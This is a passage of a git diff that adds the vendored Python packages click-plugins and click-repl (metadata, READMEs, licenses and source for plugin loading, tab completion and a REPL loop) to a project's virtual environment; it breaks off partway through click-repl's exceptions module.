b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/METADATA new file mode 100644 index 00000000..11df8ed8 --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/METADATA @@ -0,0 +1,210 @@ +Metadata-Version: 2.1 +Name: click-plugins +Version: 1.1.1 +Summary: An extension module for click to enable registering CLI commands via setuptools entry-points. +Home-page: https://github.com/click-contrib/click-plugins +Author: Kevin Wurster, Sean Gillies +Author-email: wursterk@gmail.com, sean.gillies@gmail.com +License: New BSD +Keywords: click plugin setuptools entry-point +Platform: UNKNOWN +Classifier: Topic :: Utilities +Classifier: Intended Audience :: Developers +Classifier: Development Status :: 5 - Production/Stable +Classifier: License :: OSI Approved :: BSD License +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Requires-Dist: click (>=4.0) +Provides-Extra: dev +Requires-Dist: pytest (>=3.6) ; extra == 'dev' +Requires-Dist: pytest-cov ; extra == 'dev' +Requires-Dist: wheel ; extra == 'dev' +Requires-Dist: coveralls ; extra == 'dev' + +============= +click-plugins +============= + +.. image:: https://travis-ci.org/click-contrib/click-plugins.svg?branch=master + :target: https://travis-ci.org/click-contrib/click-plugins?branch=master + +.. image:: https://coveralls.io/repos/click-contrib/click-plugins/badge.svg?branch=master&service=github + :target: https://coveralls.io/github/click-contrib/click-plugins?branch=master + +An extension module for `click `_ to register +external CLI commands via setuptools entry-points. + + +Why? +---- + +Lets say you develop a commandline interface and someone requests a new feature +that is absolutely related to your project but would have negative consequences +like additional dependencies, major refactoring, or maybe its just too domain +specific to be supported directly. Rather than developing a separate standalone +utility you could offer up a `setuptools entry point `_ +that allows others to use your commandline utility as a home for their related +sub-commands. You get to choose where these sub-commands or sub-groups CAN be +registered but the plugin developer gets to choose they ARE registered. You +could have all plugins register alongside the core commands, in a special +sub-group, across multiple sub-groups, or some combination. + + +Enabling Plugins +---------------- + +For a more detailed example see the `examples `_ section. + +The only requirement is decorating ``click.group()`` with ``click_plugins.with_plugins()`` +which handles attaching external commands and groups. In this case the core CLI developer +registers CLI plugins from ``core_package.cli_plugins``. + +.. code-block:: python + + from pkg_resources import iter_entry_points + + import click + from click_plugins import with_plugins + + + @with_plugins(iter_entry_points('core_package.cli_plugins')) + @click.group() + def cli(): + """Commandline interface for yourpackage.""" + + @cli.command() + def subcommand(): + """Subcommand that does something.""" + + +Developing Plugins +------------------ + +Plugin developers need to register their sub-commands or sub-groups to an +entry-point in their ``setup.py`` that is loaded by the core package. + +.. code-block:: python + + from setuptools import setup + + setup( + name='yourscript', + version='0.1', + py_modules=['yourscript'], + install_requires=[ + 'click', + ], + entry_points=''' + [core_package.cli_plugins] + cool_subcommand=yourscript.cli:cool_subcommand + another_subcommand=yourscript.cli:another_subcommand + ''', + ) + + +Broken and Incompatible Plugins +------------------------------- + +Any sub-command or sub-group that cannot be loaded is caught and converted to +a ``click_plugins.core.BrokenCommand()`` rather than just crashing the entire +CLI. The short-help is converted to a warning message like: + +.. code-block:: console + + Warning: could not load plugin. See `` --help``. + +and if the sub-command or group is executed the entire traceback is printed. + + +Best Practices and Extra Credit +------------------------------- + +Opening a CLI to plugins encourages other developers to independently extend +functionality independently but there is no guarantee these new features will +be "on brand". Plugin developers are almost certainly already using features +in the core package the CLI belongs to so defining commonly used arguments and +options in one place lets plugin developers reuse these flags to produce a more +cohesive CLI. If the CLI is simple maybe just define them at the top of +``yourpackage/cli.py`` or for more complex packages something like +``yourpackage/cli/options.py``. These common options need to be easy to find +and be well documented so that plugin developers know what variable to give to +their sub-command's function and what object they can expect to receive. Don't +forget to document non-obvious callbacks. + +Keep in mind that plugin developers also have access to the parent group's +``ctx.obj``, which is very useful for passing things like verbosity levels or +config values around to sub-commands. + +Here's some code that sub-commands could re-use: + +.. code-block:: python + + from multiprocessing import cpu_count + + import click + + jobs_opt = click.option( + '-j', '--jobs', metavar='CORES', type=click.IntRange(min=1, max=cpu_count()), default=1, + show_default=True, help="Process data across N cores." + ) + +Plugin developers can access this with: + +.. code-block:: python + + import click + import parent_cli_package.cli.options + + + @click.command() + @parent_cli_package.cli.options.jobs_opt + def subcommand(jobs): + """I do something domain specific.""" + + +Installation +------------ + +With ``pip``: + +.. code-block:: console + + $ pip install click-plugins + +From source: + +.. code-block:: console + + $ git clone https://github.com/click-contrib/click-plugins.git + $ cd click-plugins + $ python setup.py install + + +Developing +---------- + +.. code-block:: console + + $ git clone https://github.com/click-contrib/click-plugins.git + $ cd click-plugins + $ pip install -e .\[dev\] + $ pytest tests --cov click_plugins --cov-report term-missing + + +Changelog +--------- + +See ``CHANGES.txt`` + + +Authors +------- + +See ``AUTHORS.txt`` + + +License +------- + +See ``LICENSE.txt`` + diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/RECORD b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/RECORD new file mode 100644 index 00000000..a0bceebf --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/RECORD @@ -0,0 +1,12 @@ +click_plugins-1.1.1.dist-info/AUTHORS.txt,sha256=FUhD9wZxX5--d9KS7hUB-wnHgyS67pdnWvADk8lrLeE,90 +click_plugins-1.1.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +click_plugins-1.1.1.dist-info/LICENSE.txt,sha256=ovxTmp55udvfNAMB8D-Wci6bCbFy-kiV9mnwwmQrj3o,1517 +click_plugins-1.1.1.dist-info/METADATA,sha256=LFOtPppAX0RN1Wwn7A2Pq46juwOppLlvUGR2VNRgAPk,6390 +click_plugins-1.1.1.dist-info/RECORD,, +click_plugins-1.1.1.dist-info/WHEEL,sha256=HX-v9-noUkyUoxyZ1PMSuS7auUxDAR4VBdoYLqD0xws,110 +click_plugins-1.1.1.dist-info/top_level.txt,sha256=oB_GDZcOeOKX1eKKCfqSMR4tfJS6iL3zJshaJJPSQUI,14 +click_plugins-1.1.1.dist-info/zip-safe,sha256=AbpHGcgLb-kRsJGnwFEktk7uzpZOCcBY74-YBdrKVGs,1 +click_plugins/__init__.py,sha256=lAwJ0n4PqZCv7hk5Fz6yNL7TRrXKuhynDBGiaNSUNvo,2247 +click_plugins/__pycache__/__init__.cpython-310.pyc,, +click_plugins/__pycache__/core.cpython-310.pyc,, +click_plugins/core.py,sha256=4hhmUpFi6MSYsvxogksNu5dlKEWNscbiE9ynUy5dPdE,2475 diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/WHEEL b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/WHEEL new file mode 100644 index 00000000..c8240f03 --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/WHEEL @@ -0,0 +1,6 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.33.1) +Root-Is-Purelib: true +Tag: py2-none-any +Tag: py3-none-any + diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/top_level.txt b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/top_level.txt new file mode 100644 index 00000000..22e5b9b9 --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/top_level.txt @@ -0,0 +1 @@ +click_plugins diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/zip-safe b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/zip-safe new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/zip-safe @@ -0,0 +1 @@ + diff --git a/env/Lib/site-packages/click_plugins/__init__.py b/env/Lib/site-packages/click_plugins/__init__.py new file mode 100644 index 00000000..6bdfe38e --- /dev/null +++ b/env/Lib/site-packages/click_plugins/__init__.py @@ -0,0 +1,61 @@ +""" +An extension module for click to enable registering CLI commands via setuptools +entry-points. + + + from pkg_resources import iter_entry_points + + import click + from click_plugins import with_plugins + + + @with_plugins(iter_entry_points('entry_point.name')) + @click.group() + def cli(): + '''Commandline interface for something.''' + + @cli.command() + @click.argument('arg') + def subcommand(arg): + '''A subcommand for something else''' +""" + + +from click_plugins.core import with_plugins + + +__version__ = '1.1.1' +__author__ = 'Kevin Wurster, Sean Gillies' +__email__ = 'wursterk@gmail.com, sean.gillies@gmail.com' +__source__ = 'https://github.com/click-contrib/click-plugins' +__license__ = ''' +New BSD License + +Copyright (c) 2015-2019, Kevin D. Wurster, Sean C. Gillies +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +* Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +* Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +* Neither click-plugins nor the names of its contributors may not be used to + endorse or promote products derived from this software without specific prior + written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +''' diff --git a/env/Lib/site-packages/click_plugins/core.py b/env/Lib/site-packages/click_plugins/core.py new file mode 100644 index 00000000..0d7f5e97 --- /dev/null +++ b/env/Lib/site-packages/click_plugins/core.py @@ -0,0 +1,92 @@ +""" +Core components for click_plugins +""" + + +import click + +import os +import sys +import traceback + + +def with_plugins(plugins): + + """ + A decorator to register external CLI commands to an instance of + `click.Group()`. + + Parameters + ---------- + plugins : iter + An iterable producing one `pkg_resources.EntryPoint()` per iteration. + attrs : **kwargs, optional + Additional keyword arguments for instantiating `click.Group()`. + + Returns + ------- + click.Group() + """ + + def decorator(group): + if not isinstance(group, click.Group): + raise TypeError("Plugins can only be attached to an instance of click.Group()") + + for entry_point in plugins or (): + try: + group.add_command(entry_point.load()) + except Exception: + # Catch this so a busted plugin doesn't take down the CLI. + # Handled by registering a dummy command that does nothing + # other than explain the error. + group.add_command(BrokenCommand(entry_point.name)) + + return group + + return decorator + + +class BrokenCommand(click.Command): + + """ + Rather than completely crash the CLI when a broken plugin is loaded, this + class provides a modified help message informing the user that the plugin is + broken and they should contact the owner. If the user executes the plugin + or specifies `--help` a traceback is reported showing the exception the + plugin loader encountered. + """ + + def __init__(self, name): + + """ + Define the special help messages after instantiating a `click.Command()`. + """ + + click.Command.__init__(self, name) + + util_name = os.path.basename(sys.argv and sys.argv[0] or __file__) + + if os.environ.get('CLICK_PLUGINS_HONESTLY'): # pragma no cover + icon = u'\U0001F4A9' + else: + icon = u'\u2020' + + self.help = ( + "\nWarning: entry point could not be loaded. Contact " + "its author for help.\n\n\b\n" + + traceback.format_exc()) + self.short_help = ( + icon + " Warning: could not load plugin. See `%s %s --help`." + % (util_name, self.name)) + + def invoke(self, ctx): + + """ + Print the traceback instead of doing nothing. + """ + + click.echo(self.help, color=ctx.color) + ctx.exit(1) + + def parse_args(self, ctx, args): + return args diff --git a/env/Lib/site-packages/click_repl-0.3.0.dist-info/INSTALLER b/env/Lib/site-packages/click_repl-0.3.0.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/click_repl-0.3.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/click_repl-0.3.0.dist-info/LICENSE b/env/Lib/site-packages/click_repl-0.3.0.dist-info/LICENSE new file mode 100644 index 00000000..606882bc --- /dev/null +++ b/env/Lib/site-packages/click_repl-0.3.0.dist-info/LICENSE @@ -0,0 +1,20 @@ +Copyright (c) 2014-2015 Markus Unterwaditzer & contributors. +Copyright (c) 2016-2026 Asif Saif Uddin & contributors. + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in +the Software without restriction, including without limitation the rights to +use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies +of the Software, and to permit persons to whom the Software is furnished to do +so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/env/Lib/site-packages/click_repl-0.3.0.dist-info/METADATA b/env/Lib/site-packages/click_repl-0.3.0.dist-info/METADATA new file mode 100644 index 00000000..593e9939 --- /dev/null +++ b/env/Lib/site-packages/click_repl-0.3.0.dist-info/METADATA @@ -0,0 +1,117 @@ +Metadata-Version: 2.1 +Name: click-repl +Version: 0.3.0 +Summary: REPL plugin for Click +Home-page: https://github.com/untitaker/click-repl +Author: Markus Unterwaditzer +Author-email: markus@unterwaditzer.net +License: MIT +Platform: UNKNOWN +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Requires-Python: >=3.6 +Description-Content-Type: text/markdown +License-File: LICENSE +Requires-Dist: click (>=7.0) +Requires-Dist: prompt-toolkit (>=3.0.36) +Provides-Extra: testing +Requires-Dist: pytest-cov (>=4.0.0) ; extra == 'testing' +Requires-Dist: pytest (>=7.2.1) ; extra == 'testing' +Requires-Dist: tox (>=4.4.3) ; extra == 'testing' + +click-repl +=== + +[![Tests](https://github.com/click-contrib/click-repl/actions/workflows/tests.yml/badge.svg?branch=master)](https://github.com/click-contrib/click-repl/actions/workflows/tests.yml) +[![License](https://img.shields.io/pypi/l/click-repl?label=License)](https://github.com/click-contrib/click-repl/LICENSE) +![Python - version](https://img.shields.io/badge/python-3%20%7C%203.7%20%7C%203.8%20%7C%203.9%20%7C%203.10%20%7C%203.11-blue) +[![PyPi - version](https://img.shields.io/badge/pypi-v0.2.0-blue)](https://pypi.org/project/click-repl/) +![wheels](https://img.shields.io/piwheels/v/click-repl?label=wheel) +![PyPI - Status](https://img.shields.io/pypi/status/click) +![PyPI - Downloads](https://img.shields.io/pypi/dm/click-repl) + +Installation +=== + +Installation is done via pip: +``` +pip install click-repl +``` +Usage +=== + +In your [click](http://click.pocoo.org/) app: + +```py +import click +from click_repl import register_repl + +@click.group() +def cli(): + pass + +@cli.command() +def hello(): + click.echo("Hello world!") + +register_repl(cli) +cli() +``` +In the shell: +``` +$ my_app repl +> hello +Hello world! +> ^C +$ echo hello | my_app repl +Hello world! +``` +**Features not shown:** + +- Tab-completion. +- The parent context is reused, which means `ctx.obj` persists between + subcommands. If you're keeping caches on that object (like I do), using the + app's repl instead of the shell is a huge performance win. +- `!` - prefix executes shell commands. + +You can use the internal `:help` command to explain usage. + +Advanced Usage +=== + +For more flexibility over how your REPL works you can use the `repl` function +directly instead of `register_repl`. For example, in your app: + +```py +import click +from click_repl import repl +from prompt_toolkit.history import FileHistory + +@click.group() +def cli(): + pass + +@cli.command() +def myrepl(): + prompt_kwargs = { + 'history': FileHistory('/etc/myrepl/myrepl-history'), + } + repl(click.get_current_context(), prompt_kwargs=prompt_kwargs) + +cli() +``` +And then your custom `myrepl` command will be available on your CLI, which +will start a REPL which has its history stored in +`/etc/myrepl/myrepl-history` and persist between sessions. + +Any arguments that can be passed to the [`python-prompt-toolkit`](https://github.com/prompt-toolkit/python-prompt-toolkit) [Prompt](http://python-prompt-toolkit.readthedocs.io/en/stable/pages/reference.html?prompt_toolkit.shortcuts.Prompt#prompt_toolkit.shortcuts.Prompt) class +can be passed in the `prompt_kwargs` argument and will be used when +instantiating your `Prompt`. + + diff --git a/env/Lib/site-packages/click_repl-0.3.0.dist-info/RECORD b/env/Lib/site-packages/click_repl-0.3.0.dist-info/RECORD new file mode 100644 index 00000000..49b67d1f --- /dev/null +++ b/env/Lib/site-packages/click_repl-0.3.0.dist-info/RECORD @@ -0,0 +1,16 @@ +click_repl-0.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +click_repl-0.3.0.dist-info/LICENSE,sha256=w5qXIkFz5heQemLXVoSEvYPgWlplXqlCQH3DWjIetDE,1141 +click_repl-0.3.0.dist-info/METADATA,sha256=DF4pXhK8sH8aQ33WNAfX-umqGuIG8fgTmjehMdmBqG0,3553 +click_repl-0.3.0.dist-info/RECORD,, +click_repl-0.3.0.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +click_repl-0.3.0.dist-info/top_level.txt,sha256=F6rJUNCBcNeCP3tglg54K9NGWoA0azS09pH1B3V5LbQ,11 +click_repl/__init__.py,sha256=t3mMAVXruN3TZ72aXXHqk__ySRx7yyia8S8QnFd8Oq8,514 +click_repl/__pycache__/__init__.cpython-310.pyc,, +click_repl/__pycache__/_completer.cpython-310.pyc,, +click_repl/__pycache__/_repl.cpython-310.pyc,, +click_repl/__pycache__/exceptions.cpython-310.pyc,, +click_repl/__pycache__/utils.cpython-310.pyc,, +click_repl/_completer.py,sha256=0otlzltYbyc6BLv-kGV1S-jKPASd-ZJPfyiXsR9BkLE,9760 +click_repl/_repl.py,sha256=ABz22IoLkKEcfU7_gHbXTk7e96oxrUgDuumyjMs-ja8,4513 +click_repl/exceptions.py,sha256=b2623jlSGVISztcC07xZ6Dg1OwGbsyhwGDkEWRlQ2yU,445 +click_repl/utils.py,sha256=2r--kMG24BaF8d_RypX2KSpfKdrWkPI2YEHd5cFCbMY,6119 diff --git a/env/Lib/site-packages/click_repl-0.3.0.dist-info/WHEEL b/env/Lib/site-packages/click_repl-0.3.0.dist-info/WHEEL new file mode 100644 index 00000000..becc9a66 --- /dev/null +++ b/env/Lib/site-packages/click_repl-0.3.0.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/click_repl-0.3.0.dist-info/top_level.txt b/env/Lib/site-packages/click_repl-0.3.0.dist-info/top_level.txt new file mode 100644 index 00000000..4cf6be7d --- /dev/null +++ b/env/Lib/site-packages/click_repl-0.3.0.dist-info/top_level.txt @@ -0,0 +1 @@ +click_repl diff --git a/env/Lib/site-packages/click_repl/__init__.py b/env/Lib/site-packages/click_repl/__init__.py new file mode 100644 index 00000000..df3cea88 --- /dev/null +++ b/env/Lib/site-packages/click_repl/__init__.py @@ -0,0 +1,11 @@ +from ._completer import ClickCompleter as ClickCompleter # noqa: F401 +from ._repl import register_repl as register_repl # noqa: F401 +from ._repl import repl as repl # noqa: F401 +from .exceptions import CommandLineParserError as CommandLineParserError # noqa: F401 +from .exceptions import ExitReplException as ExitReplException # noqa: F401 +from .exceptions import ( # noqa: F401 + InternalCommandException as InternalCommandException, +) +from .utils import exit as exit # noqa: F401 + +__version__ = "0.3.0" diff --git a/env/Lib/site-packages/click_repl/_completer.py b/env/Lib/site-packages/click_repl/_completer.py new file mode 100644 index 00000000..a5922fee --- /dev/null +++ b/env/Lib/site-packages/click_repl/_completer.py @@ -0,0 +1,296 @@ +from __future__ import unicode_literals + +import os +from glob import iglob + +import click +from prompt_toolkit.completion import Completion, Completer + +from .utils import _resolve_context, split_arg_string + +__all__ = ["ClickCompleter"] + +IS_WINDOWS = os.name == "nt" + + +# Handle backwards compatibility between Click<=7.0 and >=8.0 +try: + import click.shell_completion + + HAS_CLICK_V8 = True + AUTO_COMPLETION_PARAM = "shell_complete" +except (ImportError, ModuleNotFoundError): + import click._bashcomplete # type: ignore[import] + + HAS_CLICK_V8 = False + AUTO_COMPLETION_PARAM = "autocompletion" + + +def text_type(text): + return "{}".format(text) + + +class ClickCompleter(Completer): + __slots__ = ("cli", "ctx", "parsed_args", "parsed_ctx", "ctx_command") + + def __init__(self, cli, ctx): + self.cli = cli + self.ctx = ctx + self.parsed_args = [] + self.parsed_ctx = ctx + self.ctx_command = ctx.command + + def _get_completion_from_autocompletion_functions( + self, + param, + autocomplete_ctx, + args, + incomplete, + ): + param_choices = [] + + if HAS_CLICK_V8: + autocompletions = param.shell_complete(autocomplete_ctx, incomplete) + else: + autocompletions = param.autocompletion( # type: ignore[attr-defined] + autocomplete_ctx, args, incomplete + ) + + for autocomplete in autocompletions: + if isinstance(autocomplete, tuple): + param_choices.append( + Completion( + text_type(autocomplete[0]), + -len(incomplete), + display_meta=autocomplete[1], + ) + ) + + elif HAS_CLICK_V8 and isinstance( + autocomplete, click.shell_completion.CompletionItem + ): + param_choices.append( + Completion(text_type(autocomplete.value), -len(incomplete)) + ) + + else: + param_choices.append( + Completion(text_type(autocomplete), -len(incomplete)) + ) + + return param_choices + + def _get_completion_from_choices_click_le_7(self, param, incomplete): + if not getattr(param.type, "case_sensitive", True): + incomplete = incomplete.lower() + return [ + Completion( + text_type(choice), + -len(incomplete), + display=text_type(repr(choice) if " " in choice else choice), + ) + for choice in param.type.choices # type: ignore[attr-defined] + if choice.lower().startswith(incomplete) + ] + + else: + return [ + Completion( + text_type(choice), + -len(incomplete), + display=text_type(repr(choice) if " " in choice else choice), + ) + for choice in param.type.choices # type: ignore[attr-defined] + if choice.startswith(incomplete) + ] + + def _get_completion_for_Path_types(self, param, args, incomplete): + if "*" in incomplete: + return [] + + choices = [] + _incomplete = os.path.expandvars(incomplete) + search_pattern = _incomplete.strip("'\"\t\n\r\v ").replace("\\\\", "\\") + "*" + quote = "" + + if " " in _incomplete: + for i in incomplete: + if i in ("'", '"'): + quote = i + break + + for path in iglob(search_pattern): + if " " in path: + if quote: + path = quote + path + else: + if IS_WINDOWS: + path = repr(path).replace("\\\\", "\\") + else: + if IS_WINDOWS: + path = path.replace("\\", "\\\\") + + choices.append( + Completion( + text_type(path), + -len(incomplete), + display=text_type(os.path.basename(path.strip("'\""))), + ) + ) + + return choices + + def _get_completion_for_Boolean_type(self, param, incomplete): + return [ + Completion( + text_type(k), -len(incomplete), display_meta=text_type("/".join(v)) + ) + for k, v in { + "true": ("1", "true", "t", "yes", "y", "on"), + "false": ("0", "false", "f", "no", "n", "off"), + }.items() + if any(i.startswith(incomplete) for i in v) + ] + + def _get_completion_from_params(self, autocomplete_ctx, args, param, incomplete): + + choices = [] + param_type = param.type + + # shell_complete method for click.Choice is intorduced in click-v8 + if not HAS_CLICK_V8 and isinstance(param_type, click.Choice): + choices.extend( + self._get_completion_from_choices_click_le_7(param, incomplete) + ) + + elif isinstance(param_type, click.types.BoolParamType): + choices.extend(self._get_completion_for_Boolean_type(param, incomplete)) + + elif isinstance(param_type, (click.Path, click.File)): + choices.extend(self._get_completion_for_Path_types(param, args, incomplete)) + + elif getattr(param, AUTO_COMPLETION_PARAM, None) is not None: + choices.extend( + self._get_completion_from_autocompletion_functions( + param, + autocomplete_ctx, + args, + incomplete, + ) + ) + + return choices + + def _get_completion_for_cmd_args( + self, + ctx_command, + incomplete, + autocomplete_ctx, + args, + ): + choices = [] + param_called = False + + for param in ctx_command.params: + if isinstance(param.type, click.types.UnprocessedParamType): + return [] + + elif getattr(param, "hidden", False): + continue + + elif isinstance(param, click.Option): + for option in param.opts + param.secondary_opts: + # We want to make sure if this parameter was called + # If we are inside a parameter that was called, we want to show only + # relevant choices + if option in args[param.nargs * -1 :]: # noqa: E203 + param_called = True + break + + elif option.startswith(incomplete): + choices.append( + Completion( + text_type(option), + -len(incomplete), + display_meta=text_type(param.help or ""), + ) + ) + + if param_called: + choices = self._get_completion_from_params( + autocomplete_ctx, args, param, incomplete + ) + + elif isinstance(param, click.Argument): + choices.extend( + self._get_completion_from_params( + autocomplete_ctx, args, param, incomplete + ) + ) + + return choices + + def get_completions(self, document, complete_event=None): + # Code analogous to click._bashcomplete.do_complete + + args = split_arg_string(document.text_before_cursor, posix=False) + + choices = [] + cursor_within_command = ( + document.text_before_cursor.rstrip() == document.text_before_cursor + ) + + if document.text_before_cursor.startswith(("!", ":")): + return + + if args and cursor_within_command: + # We've entered some text and no space, give completions for the + # current word. + incomplete = args.pop() + else: + # We've not entered anything, either at all or for the current + # command, so give all relevant completions for this context. + incomplete = "" + + if self.parsed_args != args: + self.parsed_args = args + self.parsed_ctx = _resolve_context(args, self.ctx) + self.ctx_command = self.parsed_ctx.command + + if getattr(self.ctx_command, "hidden", False): + return + + try: + choices.extend( + self._get_completion_for_cmd_args( + self.ctx_command, incomplete, self.parsed_ctx, args + ) + ) + + if isinstance(self.ctx_command, click.MultiCommand): + incomplete_lower = incomplete.lower() + + for name in self.ctx_command.list_commands(self.parsed_ctx): + command = self.ctx_command.get_command(self.parsed_ctx, name) + if getattr(command, "hidden", False): + continue + + elif name.lower().startswith(incomplete_lower): + choices.append( + Completion( + text_type(name), + -len(incomplete), + display_meta=getattr(command, "short_help", ""), + ) + ) + + except Exception as e: + click.echo("{}: {}".format(type(e).__name__, str(e))) + + # If we are inside a parameter that was called, we want to show only + # relevant choices + # if param_called: + # choices = param_choices + + for item in choices: + yield item diff --git a/env/Lib/site-packages/click_repl/_repl.py b/env/Lib/site-packages/click_repl/_repl.py new file mode 100644 index 00000000..5693f52b --- /dev/null +++ b/env/Lib/site-packages/click_repl/_repl.py @@ -0,0 +1,152 @@ +from __future__ import with_statement + +import click +import sys +from prompt_toolkit import PromptSession +from prompt_toolkit.history import InMemoryHistory + +from ._completer import ClickCompleter +from .exceptions import ClickExit # type: ignore[attr-defined] +from .exceptions import CommandLineParserError, ExitReplException, InvalidGroupFormat +from .utils import _execute_internal_and_sys_cmds + + +__all__ = ["bootstrap_prompt", "register_repl", "repl"] + + +def bootstrap_prompt( + group, + prompt_kwargs, + ctx=None, +): + """ + Bootstrap prompt_toolkit kwargs or use user defined values. + + :param group: click Group + :param prompt_kwargs: The user specified prompt kwargs. + """ + + defaults = { + "history": InMemoryHistory(), + "completer": ClickCompleter(group, ctx=ctx), + "message": "> ", + } + + defaults.update(prompt_kwargs) + return defaults + + +def repl( + old_ctx, prompt_kwargs={}, allow_system_commands=True, allow_internal_commands=True +): + """ + Start an interactive shell. All subcommands are available in it. + + :param old_ctx: The current Click context. + :param prompt_kwargs: Parameters passed to + :py:func:`prompt_toolkit.PromptSession`. + + If stdin is not a TTY, no prompt will be printed, but only commands read + from stdin. + """ + + group_ctx = old_ctx + # Switching to the parent context that has a Group as its command + # as a Group acts as a CLI for all of its subcommands + if old_ctx.parent is not None and not isinstance(old_ctx.command, click.Group): + group_ctx = old_ctx.parent + + group = group_ctx.command + + # An Optional click.Argument in the CLI Group, that has no value + # will consume the first word from the REPL input, causing issues in + # executing the command + # So, if there's an empty Optional Argument + for param in group.params: + if ( + isinstance(param, click.Argument) + and group_ctx.params[param.name] is None + and not param.required + ): + raise InvalidGroupFormat( + f"{type(group).__name__} '{group.name}' requires value for " + f"an optional argument '{param.name}' in REPL mode" + ) + + isatty = sys.stdin.isatty() + + # Delete the REPL command from those available, as we don't want to allow + # nesting REPLs (note: pass `None` to `pop` as we don't want to error if + # REPL command already not present for some reason). + repl_command_name = old_ctx.command.name + if isinstance(group_ctx.command, click.CommandCollection): + available_commands = { + cmd_name: cmd_obj + for source in group_ctx.command.sources + for cmd_name, cmd_obj in source.commands.items() + } + else: + available_commands = group_ctx.command.commands + + original_command = available_commands.pop(repl_command_name, None) + + if isatty: + prompt_kwargs = bootstrap_prompt(group, prompt_kwargs, group_ctx) + session = PromptSession(**prompt_kwargs) + + def get_command(): + return session.prompt() + + else: + get_command = sys.stdin.readline + + while True: + try: + command = get_command() + except KeyboardInterrupt: + continue + except EOFError: + break + + if not command: + if isatty: + continue + else: + break + + try: + args = _execute_internal_and_sys_cmds( + command, allow_internal_commands, allow_system_commands + ) + if args is None: + continue + + except CommandLineParserError: + continue + + except ExitReplException: + break + + try: + # The group command will dispatch based on args. + old_protected_args = group_ctx.protected_args + try: + group_ctx.protected_args = args + group.invoke(group_ctx) + finally: + group_ctx.protected_args = old_protected_args + except click.ClickException as e: + e.show() + except (ClickExit, SystemExit): + pass + + except ExitReplException: + break + + if original_command is not None: + available_commands[repl_command_name] = original_command + + +def register_repl(group, name="repl"): + """Register :func:`repl()` as sub-command *name* of *group*.""" + group.command(name=name)(click.pass_context(repl)) diff --git a/env/Lib/site-packages/click_repl/exceptions.py b/env/Lib/site-packages/click_repl/exceptions.py new file mode 100644 index 00000000..78c7dd09 --- /dev/null +++ b/env/Lib/site-packages/click_repl/exceptions.py @@ -0,0 +1,23 @@ +class InternalCommandException(Exception): + pass + + +class ExitReplException(InternalCommandException): + pass + + +class 